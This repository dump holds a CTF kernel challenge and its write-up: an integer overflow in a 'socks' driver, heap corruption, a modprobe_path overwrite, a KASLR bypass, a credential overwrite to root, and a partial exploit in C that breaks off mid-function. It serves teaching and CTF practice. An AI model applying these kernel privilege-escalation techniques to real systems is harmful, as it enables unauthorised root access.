├── README.md
├── challenge
    ├── Readme.md
    ├── initramfs
    ├── kernel
    └── run.sh
├── solution
    ├── README.md
    ├── exploit_kaslr_cred.c
    ├── exploit_modprobe_path.c
    ├── images
    │   ├── corrupted_ptr.png
    │   ├── data_sent.png
    │   ├── normal_alloc.png
    │   ├── ovf.png
    │   └── setup.png
    ├── pwn.sh
    └── socks.h
└── source
    ├── Makefile
    ├── socks.c
    └── socks.h


/README.md:
--------------------------------------------------------------------------------
 1 | # Kernel pwnable for r2con 2019 CTF 
 2 | 
 3 | This repository contains the challenge I contributed to the r2con 2019 CTF. The 
 4 | challenge was not solved during the CTF, so I decided to also host it on 
 5 | GitHub.
 6 | 
 7 | The repository contains the following folders:
 8 | 
 9 | * `challenge/` contains the files provided to the CTF participants. This is 
10 | the only directory with contents at the moment.
11 | 
12 | * `source/`: contains the source code of the `socks.ko` module running in the 
13 | challenge VM. By mistake I also left a half-finished v2 module inside the VM
14 | filesystem that was not relevant to the challenge.
15 | 
16 | * `solution/`: contains a write-up of my solution as well as two different 
17 | exploits to be used for reference purposes.


--------------------------------------------------------------------------------
/challenge/Readme.md:
--------------------------------------------------------------------------------
 1 | This folder contains the challenge as provided to the CTF participants,
 2 | plus this README file. The challenge server is down, but you can still 
 3 | try to write the exploit locally against the VM provided here (see 
 4 | `run.sh`).
 5 | 
 6 | The provided challenge description was as follows:
 7 | 
 8 | ```
 9 | Pull up your socks
10 | 
11 | Be careful with moths, can make small holes in your socks.
12 | 
13 | r2 has new socks, and they are in kernel land! Pwn the kernel
14 | in this challenge and read the flag off /flag.txt
15 | 
16 | nc xxx.xxx.xxx.xxx 31337
17 | ```
18 | 
19 | And the following two hints were published during the CTF in order:
20 | 
21 | 
22 | ```
23 | Take a look at how socks are allocated
24 | ```
25 | 
26 | ```
27 | Once you got arbitrary write, you can use the modprobe_path trick, similar to: https://vishnudevtj.github.io/notes/1118daysober
28 | ```
29 | 
30 | 
31 | 


--------------------------------------------------------------------------------
/challenge/initramfs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/challenge/initramfs


--------------------------------------------------------------------------------
/challenge/kernel:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/challenge/kernel


--------------------------------------------------------------------------------
/challenge/run.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | # Boot the challenge kernel + initramfs in QEMU: SMEP/SMAP off, -m 64, serial console only.
3 | qemu-system-x86_64 -cpu qemu64,-smep,-smap \
4 | 	-m 64 \
5 | 	-kernel ./kernel \
6 | 	-nographic \
7 | 	-append "console=ttyS0 quiet" -initrd ./initramfs \
8 | 	-monitor /dev/null
9 | 


--------------------------------------------------------------------------------
/solution/README.md:
--------------------------------------------------------------------------------
  1 | # r2con 2019 kernel exploitation challenge solution
  2 | 
  3 | This is the reference solution to the challenge, exploiting an intended integer
  4 | overflow bug. It is quite possible that other exploitable bugs exist.
  5 | 
  6 | Note that the write-up uses the source code as a reference, but the original 
  7 | challenge only provided the module binary.
  8 | 
  9 | ## Driver functionality: analysis
 10 | 
 11 | The `socks.ko` driver running inside the provided VM exposes a device through 
 12 | `/dev/socks`. The exposed device allows tasks to communicate with each other by 
 13 | means of "sockets", each of which is defined by an open `/dev/socks` file 
 14 | descriptor.
 15 | 
 16 | When a file descriptor is created, the `socks_open` function creates a new 
 17 | socket as follows:
 18 | 
 19 | ```c
 20 | static int socks_open(struct inode *inode, struct file *file)
 21 | {
 22 | 
 23 |     sock_t *sock = kzalloc(sizeof(*sock), GFP_KERNEL);
 24 |     
 25 |     if (!sock)
 26 |         return -ENOMEM;
 27 | 
 28 |     /*
 29 |      * private_data is used to keep driver-specific data. The 
 30 |      * kernel does not touch this field at all, so drivers can
 31 |      * place their data here and get it out e.g. in ioctl.
 32 |      */
 33 | 
 34 |     file->private_data = sock;
 35 | 
 36 |     /* Initialize empty listening_list head */
 37 |     INIT_LIST_HEAD(&sock->listening_list);
 38 |     pr_info("New socks successfully created!\n");
 39 | 
 40 |     return 0;
 41 | }
 42 | ```
 43 | 
 44 | As can be seen, a `sock_t` structure is created and stored as `private_data`, 
 45 | which is then accessible through the `struct file *` provided to the different 
 46 | file operations functions.
 47 | 
 48 | The following file_operations are defined:
 49 | 
 50 | ```c
 51 | static const struct file_operations socks_fops = {
 52 |     .owner			= THIS_MODULE,
 53 |     .open			= socks_open,
 54 |     .release		= socks_close,
 55 |     .llseek 		= no_llseek,
 56 |     .unlocked_ioctl = socks_ioctl,
 57 | };
 58 | ```
 59 | 
 60 | Of these, the most interesting one is `socks_ioctl` since it allows us to 
 61 | interact with the created socket. `socks_close` will only be used after no more 
 62 | references to the `struct file *` are left, which could also be of interest.
 63 | 
 64 | The `socks_ioctl` function implements 4 actions on the socket:
 65 | 
 66 | * `IOCTL_SOCKS_INIT` initializes the socket. This is required before any other 
 67 | code can be used.
 68 | 
 69 | * `IOCTL_SOCKS_LISTEN` puts the socket to listen under a globally unique name. 
 70 | Requires having initialized the socket.
 71 | 
 72 | * `IOCTL_SOCKS_CONNECT` connects the current socket to a listening socket, 
 73 | identified by its name. Requires having initialized the socket.
 74 | 
 75 | * `IOCTL_SOCKS_SEND` and `IOCTL_SOCKS_RECV` allow sending data through the socket
 76 | and receiving it, respectively. Require a connected socket.
 77 | 
 78 | Each of these ioctl codes is implemented in a separate function in the source 
 79 | code, but they get inlined into `socks_ioctl` in the compiled version.
 80 | 
 81 | ### Socket initialization - intended vulnerability
 82 | 
 83 | When initializing a socket, the ioctl argument is interpreted as an `unsigned 
 84 | long` and represents a buffer size:
 85 | 
 86 | ```c
 87 | static long socks_ioctl_init(sock_t *sock, unsigned long arg) {
 88 | [1] uint64_t size = arg + sizeof(sock_buf_t);
 89 |     sock_buf_t *buf = NULL;
 90 |     int err = 0;
 91 | 
 92 |     // Sanity check without locking the buffer.
 93 | [2] if (size > MAX_SIZE) {
 94 |         return -EINVAL;
 95 |     }
 96 | 
 97 |     // First off: lock the buffer
 98 | 
 99 |     spin_lock(&sock->lock);
100 | 
101 |     if (sock->state != UNINITIALIZED) {
102 |         err = -EINVAL;
103 |         goto out_unlock;
104 |     }
105 | 
106 | [3] buf = kzalloc(size, GFP_KERNEL);
107 |     printk(KERN_ALERT "Allocated ptr %llx\n", buf);
108 | 
109 |     if (IS_ERR_OR_NULL(buf)) {
110 |         err = (buf ? PTR_ERR(buf) : -ENOMEM);
111 |         goto out_unlock;
112 |     }
113 | 
114 |     sock->buf = buf;
115 |     sock->buf->size = size - sizeof(sock_buf_t);
116 |     sock->buf->write_index = 0;
117 |     sock->buf->read_index = 0;
118 | [4] sock->buf->buffer = (unsigned char *)buf + sizeof(sock_buf_t); // Buffer is inline
119 | 
120 |     sock->state = INITIALIZED;
121 | 
122 |     pr_info("Initialized socket with buffer size %lx\n", sock->buf->size);
123 | 
124 | 
125 | out_unlock:
126 |     spin_unlock(&sock->lock);
127 |     return err;
128 | }
129 | ```
130 | 
131 | At `[1]` the size of a structure `sock_buf_t` is added to the requested size,
132 | potentially overflowing. At `[2]` a check is performed, but the damage is 
133 | already done.
134 | 
135 | Next, at `[3]` a buffer of the computed size is allocated and later 
136 | initialized. The allocated buffer contains a header of type `sock_buf_t` and an 
137 | inline buffer of the requested size, with the `buffer` pointer of `sock_buf_t` 
138 | pointing to the inlined space.
139 | 
140 | Under normal circumstances, the `buffer` field of a `sock_buf_t` points into a 
141 | `size`-byte long buffer that follows it on the heap, as shown here:
142 | 
143 | ![Socket buffer with a regular allocation](images/normal_alloc.png "Socket buffer with a regular allocation")
144 | 
145 | Now, if we provide an `arg` value bigger than `ULONG_MAX-0x20` the addition at 
146 | `[1]` will overflow, the wrapped-around `size` will pass the check at `[2]`, and 
147 | the `buffer` field will point out of bounds. If we use a value of -1 (or 
148 | `ULONG_MAX`) the requested size will be 0x1F and the structure will be allocated 
149 | from the `kmalloc-32` slab. In that case, the `buffer` field will point to the next heap object, as illustrated here:
150 | 
151 | ![Socket buffer after triggering an integer overflow](images/ovf.png "Socket buffer after triggering an integer overflow")
152 | 
153 | Therefore, any uses of this field to access memory will result in out-of-bounds 
154 | reads or writes. 
155 | 
156 | ### Listening and connecting
157 | 
158 | When we try to listen on a socket, the code checks that the state is valid (i.e.
159 | INITIALIZED) and that there are no name clashes with other listening sockets:
160 | 
161 | ```c
162 |     /*
163 |      * Not allowed to listen unless we are in initialized
164 |      * state.
165 |      */
166 |     if (sock->state != INITIALIZED) {
167 |         err = -EINVAL;
168 |         goto out_unlock;
169 |     }
170 | 
171 |     /* Make sure there is no other socket with this name */
172 |     spin_lock(&sock_device.lock);
173 |     if (socks_find_listening_device(param->name)) {
174 |         err = -EINVAL;
175 |         pr_err("There's already a socket with that name");
176 |         spin_unlock(&sock_device.lock);
177 |         goto out_unlock;
178 |     }
179 |  
180 | ```
181 | 
182 | If all this is good, the socket gets added to a global list of listening sockets
183 | within the sock_device structure and sets its state to LISTENING:
184 | 
185 | ```c
186 |     /* Alright, nobody else on that list. Add to the list and set to listening */
187 |     strcpy(sock->name, param->name);
188 |     sock->state = LISTENING;
189 |     list_add(&sock->listening_list, &sock_device.listening);
190 |     pr_info("Socket is now listening at %s\n", param->name);
191 |     spin_unlock(&sock_device.lock);
192 | ```
193 | 
194 | When a socket tries to connect to a listening socket, the driver does a similar 
195 | state check and then searches for the listening socket. If found, it'll set both
196 | ends to CONNECTED and bind them through the `peer` field in the `sock_t` structure:
197 | 
198 | ```c
199 |     spin_lock(&sock_device.lock);
200 |     if ( (peer = socks_find_listening_device(param->name)) == NULL) {
201 |         pr_err("No socket with that name found");
202 |         err = -EINVAL;
203 |         spin_unlock(&sock_device.lock);
204 |         goto out_unlock;
205 |     }
206 | 
207 |     /* Remove peer from listening list */
208 |     spin_lock(&peer->lock);
209 |     list_del_init(&peer->listening_list);
210 |     spin_unlock(&sock_device.lock);
211 | 
212 |     /* Connect the two sockets */
213 |     sock->state = CONNECTED;
214 |     sock->peer = peer;
215 |     peer->peer = sock;
216 |     peer->state = CONNECTED;
217 | 
218 |     pr_info("Successfully connected to %s\n", param->name);
219 |     spin_unlock(&peer->lock);
220 | ```
221 | 
222 | ### Sending and receiving data
223 | 
224 | Sending and receiving data starts by making sure that the socket state is 
225 | CONNECTED. The data intended for a given socket is stored in its own `sock_buf_t` 
226 | buffer.
227 | 
228 | Thus, when sending data, the code finds the peer socket and makes sure the data 
229 | will fit. If so, it copies the data. When receiving data, the code finds the 
230 | current socket's buffer and tries to fetch data off it.
231 | 
232 | The code is a little convoluted because it implements a (buggy) circular buffer
233 | mechanism. The `write_index` field indicates where data will be written to, 
234 | while the `read_index` field indicates where the first unread byte is available.
235 | 
236 | They both start at 0, and evolve depending on the usage. If `write_index` 
237 | reaches the end of the buffer, it wraps around to zero. And the same occurs with
238 | `read_index`.
239 | 
240 | For example, this is part of the `socks_push` function implementing adding data 
241 | to a buffer:
242 | 
243 | ```c
244 |     /*
245 |      * If data doesn't fit, fail.
246 |      */
247 |     if (sock_buf_left(buf) < size) {
248 |         return -ENOMEM;
249 |     }
250 | 
251 | 
252 |     /* 
253 |      * We can write up to read_index if it's bigger than write_index,
254 |      * or up to end of buffer otherwise.
255 |      */
256 |     size_t max_write_index = (buf->read_index > buf->write_index) ? buf->read_index : buf->size;
257 |     size_t copy1_size = min(size, max_write_index - buf->write_index);
258 |     size_t prev_write_index = buf->write_index;
259 | 
260 |     if (copy_from_user(buf->buffer + buf->write_index, buffer, copy1_size)) {
261 |         return -ENOMEM;
262 |     }
263 | 
264 |     /* Update our write index */
265 |     buf->write_index = (buf->write_index + copy1_size) % buf->size;
266 | ```
267 | 
268 | ## Exploitation - reference solution
269 | 
270 | In this section I will provide my initial solution, and in the next one an 
271 | alternative solution that bypasses KASLR as well. If you haven't solved the 
272 | challenge, now would be a good time to give it a try before reading on!
273 | 
274 | ### Available primitives
275 | 
276 | So we have an integer overflow bug that results in a `sock->buf->buffer` pointing 
277 | out of bounds. As we've seen above, if the given socket is connected AND we send 
278 | data to it, the sent data will corrupt adjacent heap memory. This is of course 
279 | very useful :)
280 | 
281 | Furthermore, if we first send data to the buffer (corrupting whatever is behind 
282 | it) but then have the kernel replace it by something else we can also read the 
283 | replaced data back by receiving it through the socket.
284 | 
285 | ### Challenge setup
286 | 
287 | The challenge setup was quite simple, in the sense that the kernel was running 
288 | with almost no mitigations. In particular:
289 | 
290 | * HARDENED_USERCOPY was disabled
291 | * SMEP and SMAP were not available
292 | * KASLR was not compiled in
293 | * /proc/kallsyms was world-readable
294 | * Heap randomization was turned off, as well as other heap hardening options
295 | 
296 | ### Exploitation approach
297 | 
298 | Given the structures and functionality in this module, it is quite simple to 
299 | achieve arbitrary write capabilities. To do so, I took the following 
300 | approach in my reference solution:
301 | 
302 | 1. Create a bunch of sockets of size 0 to fill up the kmalloc-32 slabs
303 | 2. Create 2 more sockets of size -1 and connect them to each other
304 | 3. Send data to the first socket to smash the second socket `sock_buf_t`, 
305 | setting `buffer` to an arbitrary value.
306 | 4. Send data to the second buffer to achieve arbitrary write.
307 | 
308 | For my original solution I chose to overwrite `modprobe_path`, since module 
309 | auto-loading was enabled without any filtering. I replaced it with the string 
310 | `/home/user/pwn.sh`, the path of an executable script with these contents:
311 | 
312 | ```
313 | #!/bin/sh
314 | id > /tmp/pwn3d
315 | cp /flag.txt /home/user/flag.txt
316 | chmod 777 /home/user/flag.txt
317 | ```
318 | 
319 | After this, we can cause the script to be executed by e.g. creating an SCTP 
320 | socket or trying to load an executable file with an invalid format.
321 | 
322 | In order to run the exploit on the target machine, we simply have to compile it 
323 | statically and send it over. The machine was configured with qemu networking on, 
324 | so you could find the host at 10.0.2.2, or in the CTF use any machine with a 
325 | public IP address.
326 | 
327 | As an example, here is a run on my test machine (note this has the actual CTF 
328 | flag, while the VM I provided contains an all-zeroes flag):
329 | 
330 | ```sh
331 | ~ $ cd ; nc 10.0.2.2 1234 > exploit ; chmod +x exploit
332 | ~ $ nc 10.0.2.2 1234 > pwn.sh ; chmod +x pwn.sh
333 | ~ $ ./exploit
334 | [...] 
335 | 
336 | [  224.945090] Initialized socket with buffer size 0
337 | [  224.945510] New socks successfully created!
338 | [  224.945917] Initialized socket with buffer size 0
339 | [  224.946287] New socks successfully created!
340 | [  224.946534] Initialized socket with buffer size 0
341 | [  224.946937] New socks successfully created!
342 | [  224.947368] Initialized socket with buffer size 0
343 | [  224.947970] New socks successfully created!
344 | [  224.948379] New socks successfully created!
345 | [  224.948831] Initialized socket with buffer size ffffffffffffffff
346 | [*] Trying to listen in test_socket
347 | [  224.952268] Length of name: 11
348 | [  224.952476] Searching for socket test_socket
349 | [  224.952845] Socket is now listening at test_socket
350 | [  224.953220] Initialized socket with buffer size 0
351 | [*] Trying to connect to test_socket
352 | [  224.954180] Length of name: 11
353 | [  224.954473] Searching for socket test_socket
354 | [  224.955079] Successfully connected to test_socket
355 | ~ $ cat flag.txt 
356 | r2con{06e6ec5e2653a51e6e383ee4776a6670}
357 | ~ $ cat /tmp/pwn3d 
358 | uid=0(root) gid=0(root)
359 | ~ $ 
360 | ```
361 | 
362 | See `exploit_modprobe_path.c` for this solution. Make sure you also place the 
363 | `pwn.sh` script in `/home/user/` if you test it.
364 | 
365 | ## Exploitation - stable arbitrary read/write and KASLR bypass
366 | 
367 | I was chatting with [@dialluvioso_](https://twitter.com/dialluvioso_) while he tried 
368 | to solve the challenge, and he mentioned he wanted to avoid the `modprobe_path` 
369 | solution and also assume KASLR was on.
370 | 
371 | I hadn't really thought much about it for this challenge, but given the bug 
372 | it is obvious that one can easily get arbitrary read/write by correctly setting
373 | up the `sock_buf_t` structure.
374 | 
375 | However, for bypassing KASLR one needs to know some valid kernel pointer before 
376 | attempting to e.g. find the current task structure and change its credentials.
377 | 
378 | Additionally, if we smash a `sock_buf_t` via a `send` like we did above, the write 
379 | index for the corresponding socket gets incremented as well. For this reason, 
380 | you cannot simply overwrite the `sock_buf_t` over and over by sending additional
381 | data.
382 | 
383 | A very simple solution is to free the buffer and make a new one in its place. If
384 | all goes well, the new `sock_buf_t` will be placed in the hole left behind by 
385 | the old one and we'll be able to smash the buffer again.
386 | 
387 | However, this could also fail if another kernel path reallocates the object 
388 | before us, and we'd be introducing a chance for this to happen for every read or 
389 | write we perform.
390 | 
391 | If we analyze the `socks_push` function, we can see that IF `copy_from_user` 
392 | fails the write index won't be incremented:
393 | 
394 | ```c
395 |     /* 
396 |      * We can write up to read_index if it's bigger than write_index,
397 |      * or up to end of buffer otherwise.
398 |      */
399 |     size_t max_write_index = (buf->read_index > buf->write_index) ? buf->read_index : buf->size;
400 |     size_t copy1_size = min(size, max_write_index - buf->write_index);
401 |     size_t prev_write_index = buf->write_index;
402 | 
403 |     if (copy_from_user(buf->buffer + buf->write_index, buffer, copy1_size)) {
404 |         return -ENOMEM;
405 |     }
406 | 
407 |     /* Update our write index */
408 |     buf->write_index = (buf->write_index + copy1_size) % buf->size;
409 | ```
410 | 
411 | This actually opens a door for us to corrupt the adjacent `sock_buf_t` without 
412 | incrementing the write index as follows:
413 | 
414 | 1. We allocate two pages with `mmap`, at address `X`
415 | 2. We mark the page at `X + 0x1000` as unreadable with `mprotect` and `PROT_NONE`
416 | 3. We write our fake `sock_buf_t` at `X + 0xFE0`, i.e. 0x20 bytes before the 
417 | unreadable page.
418 | 4. We send 0x21 bytes through the buffer starting at `X + 0xFE0`.
419 | 
420 | The `copy_from_user` function will actually copy 0x20 bytes and then generate a 
421 | page fault. This additionally results in calling `memset` to clear the last byte, 
422 | as can be seen here:
423 | 
424 | ```c
425 | unsigned long _copy_from_user(void *to, const void __user *from, unsigned long n)
426 | {
427 | 	unsigned long res = n;
428 | 	might_fault();
429 | 	if (likely(access_ok(VERIFY_READ, from, n))) {
430 | 		kasan_check_write(to, n);
431 | 		res = raw_copy_from_user(to, from, n);
432 | 	}
433 | 	if (unlikely(res)) {
434 | 		memset(to + (n - res), 0, res);
435 | 	}
436 | 	return res;
437 | }
438 | ```
439 | 
440 | Thus, we corrupt 0x20 bytes with controlled data and an additional byte with zero,
441 | and the write_index remains zero. Using this trick we can therefore corrupt the 
442 | adjacent `sock_buf_t` repeatedly and get a stable read/write primitive without 
443 | the need for reallocating anything.
444 | 
445 | The only missing element is a pointer leak. The following idea came up during 
446 | the discussion:
447 | 
448 | 1. Create and connect two sockets. Their buffers should be adjacent to the buffer 
449 | we will use for performing memory corruption, thus we need to use the bug with 
450 | them as well. The last few sockets on the heap now look as follows:
451 | 	
452 | 	![Heap layout after initial setup](images/setup.png "Heap layout after initial setup")
453 | 
454 | 
455 | 2. Send data to the first of these sockets, thus incrementing its `write_index` 
456 | to an arbitrary value. Note that, because of the bug, every byte sent is also 
457 | written out of bounds, so I decided to send 0x20 bytes to make sure I only 
458 | overwrite one `sock_buf_t` and nothing beyond it. This would leave us with the 
459 | following heap layout:
460 | 
461 | 	![Heap layout after sending data](images/data_sent.png "Heap layout after sending data")
462 | 
463 | 
464 | 3. Set the last byte of `sock_buf_t->buffer` to 0x00. This will most likely 
465 | misalign the value and make it point to an earlier `sock_buf_t` as shown in the 
466 | figure below:
467 | 
468 | 	![Heap layout after corrupting the buffer pointer](images/corrupted_ptr.png "Heap layout after corrupting the buffer pointer")
469 | 
470 | 	Note that this is an example but there are no guarantees that the `sock_buf_t`
471 | 	the buffer points to after setting its LSB to 0x00 is exactly 2 buffers before 
472 | 	our corrupted `sock_buf_t`.
473 | 
474 | 4. Read the data from the buffer through `socks_recv`. We should now learn the 
475 | contents of the `sock_buf_t`, including a pointer to itself.
476 | 
477 | From here, we learn the address of a kmalloc-32 object close to the overflown 
478 | buffer (at most 0xe0 bytes earlier). We can now use the arbitrary read to find 
479 | exactly where the overflown buffer was by searching for the data written in step 
480 | 2 above.
481 | 
482 | This is how I do that in my exploit:
483 | 
484 | ```c
485 | uint64_t leak(void) {
486 |   int ret;
487 |   *((uint64_t *) (ptr + 0xff8)) = 8;
488 | 
489 |   /* Make sure there are 0x20 bytes available to be read */
490 |   char buf[0x20] = { [0 ... 0x1f] = 'A' };
491 |   ret = sock_send(fds[3], buf, 0x20);
492 |   
493 |   /* Smash `size` and set LSB of buffer to 0x00 */
494 |   ret = sock_send(fds[0], ptr + 0xff8, 9);
495 | 
496 |   /* Read 0x20 bytes from modified buffer pointer */
497 |   ret = sock_recv(fds[2], buf, 0x20);
498 |   return *((uint64_t *) (buf + 8));;
499 | }
500 | 
501 | int main(int argc, char* argv[argc+1]) {
502 | 
503 | 	// ...
504 | 
505 | 	uint64_t addr = leak();
506 | 
507 | 	uint64_t fds3 = 0;
508 | 
509 | 	for(int i=0; i < 256; i+= 8) {
510 | 		uint64_t data = read64(addr + i);
511 | 		if (data == 0x4141414141414100) {
512 | 			/* found fds[3] ! */
513 | 			fds3 = addr + i;
514 | 		}
515 | 	}
516 | 
517 | 	if (!fds3) {
518 | 		printf("[!] Failed to find fds[3]\n");
519 | 		exit(0);
520 | 	}
521 | 
522 | 	printf("[*] fds[3] sock_buf_t at %lx\n", fds3);
523 | 	uint64_t target = fds3 - 4*0x20;
524 | 
525 | ```
526 | 
527 | 
528 | Once we know this, we can free an arbitrary `sock_buf_t` and replace it with 
529 | another kmalloc-32 object containing pointers to the kernel .text or .data 
530 | sections in order to fully bypass KASLR.
531 | 
532 | After a small search, I found the following two options:
533 | 
534 | 1. The `shmat` syscall allocates a structure of type `struct shm_file_data` using 
535 | `kzalloc`:
536 | 
537 | 	```c
538 | 	struct shm_file_data {
539 | 		int id;
540 | 		struct ipc_namespace *ns;
541 | 		struct file *file;
542 | 		const struct vm_operations_struct *vm_ops;
543 | 	};
544 | 	```
545 | 
546 | 	Both the `ns` and the `vm_ops` fields point to kernel .data. Thus all we 
547 | 	need to do is to create a shared memory area with `shmget` at the beginning 
548 | 	of the exploit and map it with `shmat` after we've leaked the kmalloc-32 
549 | 	address.
550 | 
551 | 2. When opening a file using the `seq_file` facility, `single_open` allocates a 
552 | `struct seq_operations` with `kmalloc`. This structure contains four function 
553 | pointers, as shown here: 
554 | 
555 | 	```c
556 | 	struct seq_operations {
557 | 		void * (*start) (struct seq_file *m, loff_t *pos);
558 | 		void (*stop) (struct seq_file *m, void *v);
559 | 		void * (*next) (struct seq_file *m, void *v, loff_t *pos);
560 | 		int (*show) (struct seq_file *m, void *v);
561 | 	};
562 | 	```
563 | 
564 | 	All we need to do in this case is open a file descriptor to any file that 
565 | 	uses `single_open`, for example `/proc/self/stat`.
566 | 
567 | After we leaked the kernel base address, we can just find `init_task` by adding 
568 | its offset. Then we can iterate the task structure and give ourselves root.
569 | 
570 | I've implemented this solution in `exploit_kaslr_cred.c`. By default the code 
571 | uses the `single_open` approach to find the kernel base, but can be compiled 
572 | with `-DUSE_SHMEM_LEAK` to use the shmem-based approach. 
573 | 
574 | When running the exploit you should see something like this:
575 | 
576 | ```sh
577 | $ ./test
578 | 
579 | ...
580 | 
581 | [*] fds[3] sock_buf_t at ffff888002f9e520
582 | [*] Kernel base: 0xffffffff81000000
583 | [*] We are: 0
584 | /bin/sh: can't access tty; job control turned off
585 | /home/user # id
586 | uid=0(root) gid=0(root)
587 | /home/user # cat /flag.txt 
588 | r2con{06e6ec5e2653a51e6e383ee4776a6670}
589 | /home/user # 
590 | ```
591 | 
592 | 


--------------------------------------------------------------------------------
/solution/exploit_kaslr_cred.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <fcntl.h>
  3 | #include <stdio.h>
  4 | #include <stdlib.h>
  5 | #include <limits.h>
  6 | #include <unistd.h>
  7 | #include <stdint.h>
  8 | #include <sys/stat.h>
  9 | #include <sys/mman.h>
 10 | #include <sys/syscall.h>
 11 | #include <string.h>
 12 | #include <errno.h>
 13 | #include  <sys/types.h>
 14 | #include  <sys/ipc.h>
 15 | #include  <sys/shm.h>
 16 | #include  <stdio.h>
 17 | #include <sys/prctl.h>
 18 | 
 19 | #include "socks.h"
 20 | 
 21 | 
 22 | /*
 23 |  * Uncomment this define to use the shmem leak instead of the 
 24 |  * seq_file one. You can also use -DUSE_SHMEM_LEAK when compiling
 25 |  * the code instead.
 26 |  */
 27 | 
 28 | // #define USE_SHMEM_LEAK
 29 | /* Userspace copy of the driver's sock_buf_t header layout (four 8-byte fields on x86-64). */
 30 | typedef struct sock_buf {
 31 | 	size_t size;           /* capacity of the data area, in bytes */
 32 | 	unsigned char *buffer; /* data area; the driver points it just past this header */
 33 | 	size_t read_index;     /* offset of the first unread byte */
 34 | 	size_t write_index;    /* offset where the next byte will be written */
 35 | 	// Inline buffer! (in the driver's allocation the data follows the header directly)
 36 | } sock_buf_t;
 37 | 
 38 | static char *ptr = NULL; /* 0x2000-byte mapping created in main; its second page is PROT_NONE */
 39 | int spray_fd[1000];      /* /dev/socks descriptors opened by the first loop in main */
 40 | int fds[4];              /* working sockets: main connects fds[1] to fds[0] and fds[3] to fds[2] */
 41 | /* Issue IOCTL_SOCKS_INIT on fd; size is handed to the driver as the raw ioctl argument. */
 42 | int sock_init(int fd, size_t size) {
 43 | 	return ioctl(fd, IOCTL_SOCKS_INIT, size);
 44 | }
 45 | /* Ask the driver to make fd listen under `name` (truncated to fit the request). */
 46 | int sock_listen(int fd, char *name) {
 47 | 	struct sock_name_param req;
 48 | 	memset(&req, 0, sizeof req);
 49 | 	strncpy(req.name, name, sizeof req.name - 1); /* zero-fill above keeps the NUL */
 50 | 	printf("[*] Trying to listen in %s\n", req.name);
 51 | 	int rc = ioctl(fd, IOCTL_SOCKS_LISTEN, &req);
 52 | 	return rc;
 53 | }
 54 | /* Ask the driver to connect fd to the socket listening under `name`. */
 55 | int sock_connect(int fd, char *name) {
 56 | 	struct sock_name_param req;
 57 | 	memset(&req, 0, sizeof req);
 58 | 	strncpy(req.name, name, sizeof req.name - 1); /* zero-fill above keeps the NUL */
 59 | 	printf("[*] Trying to connect to %s\n", req.name);
 60 | 	return ioctl(fd, IOCTL_SOCKS_CONNECT, &req);
 61 | }
 62 | /* Send `size` bytes starting at `buffer` through the connected socket fd. */
 63 | int sock_send(int fd, void *buffer, size_t size) {
 64 | 	struct sock_buffer_param req = { .buffer = buffer, .size = size };
 65 | 	return ioctl(fd, IOCTL_SOCKS_SEND, &req);
 66 | }
 67 | /* Receive up to `size` bytes from the connected socket fd into `buffer`. */
 68 | int sock_recv(int fd, void *buffer, size_t size) {
 69 | 	struct sock_buffer_param req = { .buffer = buffer, .size = size };
 70 | 	return ioctl(fd, IOCTL_SOCKS_RECV, &req);
 71 | }
 72 | 
 73 | /*
 74 |  * init_task offset from the base of the kernel. Obtained by subtracting 
 75 |  * init_task - _stext, which can be read off /proc/kallsyms.
 76 |  */
 77 | 
 78 | #define INIT_TASK 0x100f740L
 79 | 
 80 | /* shm_vm_ops  offset from the kernel base. */
 81 | #define SHMEM_VM_OPS 0x1056b00
 82 | 
 83 | /* single_start  offset from the kernel base. */
 84 | #define SINGLE_START 0x1c1fd0
 85 | 
 86 | /*
 87 |  * Offsets in the task structure. Obtained by dumping a valid cred 
 88 |  * structure and heuristically checking for them.
 89 |  */
 90 | 
 91 | #define COMM 0x570
 92 | #define CRED 0x560
 93 | #define TASKS 0x2c8
 94 | 
 95 | /*
 96 |  * Read 8 bytes of kernel memory at addr. Stages a fake sock_buf_t header
 97 |  * (size 8, buffer = addr, read_index 0, write_index 8) in the last 0x20
 98 |  * bytes of the readable page at ptr, pushes it with a faulting send on
 99 |  * fds[0], then receives the 8 "pending" bytes on fds[2].
100 |  */
101 | uint64_t read64(uint64_t addr) {
102 | 	uint64_t *hdr = (uint64_t *) (ptr + 0xfe0);
103 | 	hdr[0] = 8;    /* size */
104 | 	hdr[1] = addr; /* buffer */
105 | 	hdr[2] = 0;    /* read_index */
106 | 	hdr[3] = 8;    /* write_index: 8 bytes readable */
107 | 
108 | 	/* 0x21 bytes run into the PROT_NONE page, so this send is expected to fail. */
109 | 	(void) sock_send(fds[0], ptr + 0xfe0, 0x21);
110 | 	uint64_t data = 0; /* defined result even if the receive copies nothing */
111 | 	sock_recv(fds[2], (char *) &data, 8);
112 | 	return data;
113 | }
114 | 
115 | 
116 | /*
117 |  * Write `value` (8 bytes) to kernel address addr. Stages a fake sock_buf_t
118 |  * header (size 8, buffer = addr, both indices 0), pushes it with a faulting
119 |  * send on fds[0], then sends the payload on fds[3]. Returns `value`.
120 |  */
121 | uint64_t write64(uint64_t addr, uint64_t value) {
122 | 	uint64_t *hdr = (uint64_t *) (ptr + 0xfe0);
123 | 	hdr[0] = 8;    /* size */
124 | 	hdr[1] = addr; /* buffer */
125 | 	hdr[2] = 0;    /* read_index */
126 | 	hdr[3] = 0;    /* write_index: empty, 8 bytes writable */
127 | 	/* 0x21 bytes run into the PROT_NONE page, so this send is expected to fail. */
128 | 	sock_send(fds[0], ptr + 0xfe0, 0x21);
129 | 	uint64_t payload = value;
130 | 	sock_send(fds[3], (char *) &payload, 8);
131 | 
132 | 	return payload;
133 | }
134 | 
135 | /*
136 |  * Initial heap leak. Queues 0x20 bytes for fds[2], then uses a faulting
137 |  * 9-byte send on fds[0] to set the adjacent header's `size` to 8 and zero
138 |  * the low byte of its `buffer` pointer, and reads 0x20 bytes via fds[2].
139 |  *
140 |  * Returns the second qword read back: the `buffer` field of whichever
141 |  * sock_buf_t the truncated (256-byte aligned) pointer landed on.
142 |  */
143 | uint64_t leak(void) {
144 |   char buf[0x20];
145 |   uint64_t leaked = 0;
146 |   /* Make sure there are 0x20 bytes available to be read */
147 |   memset(buf, 'A', sizeof(buf));
